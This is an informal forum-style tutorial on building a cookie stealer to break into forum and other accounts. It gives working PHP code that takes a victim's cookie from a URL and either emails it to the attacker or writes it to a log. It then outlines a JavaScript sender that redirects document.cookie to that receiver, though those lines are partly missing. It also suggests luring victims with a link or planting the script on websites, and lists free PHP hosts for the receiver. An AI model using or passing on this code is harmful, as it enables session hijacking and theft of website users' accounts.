Posts
Cookie Stealing : Basics!
hello,this is zizipo[whos running out of tutorials!!] i deciced to talk about cookie stealers:) which can be used to hack passwords,forums... so my first question 2 u is what is a cookie stealer? how does it work? so i can respond to that:).. just like an email,the cookie has a receiver and sender!..
the sender must know social engineering or so.. and they can attach the cookie to something !..
and the receiver.. well the name says it all!:)
so the first thing you have to learn is the code:).. n00bs.. find difficulties with making the code:).the only 2 things needed to make a receiver are a webhost[needs to support pho],and notepad!... http get method is the best method to send information to a PhP document!, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS
- ,x is the argument name:D.
the receiver must receive the cookie,so just use mails.. or logs. ill talk about both!.. .
ill start with emailing.this is a beast[functioning code]
// line 1
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?> // line 4Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.
now the second way.. which is storing it inside a log.. . (functioning code)
// line 1
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.
Step Two: Implementing the Stealer
using the sender is the hardest part in cookie stealing!. the easiest things,require html and java which isnt that easy!!. Here is an example of a sender.
HTML
// Line 3
Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line
2 adds document.cookie to the end of the URL, which is then stored in
document.location. Whenever document.location is changed, the browser
is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).
here is how the sender will work:)
to
do that.. you can trick the receiver like posting the cookie code on a
website. and the receiver actually thinking it was an html!.. .
You can trick the victim into clicking a link which activates the sender. For example:
HTML
Click here!
Free PHP hosts:
http://www.0php.com/free_PHP_webhosting.php
http://www.free-webhosts.com/free-php-webhosting.php
0 comments:
Post a Comment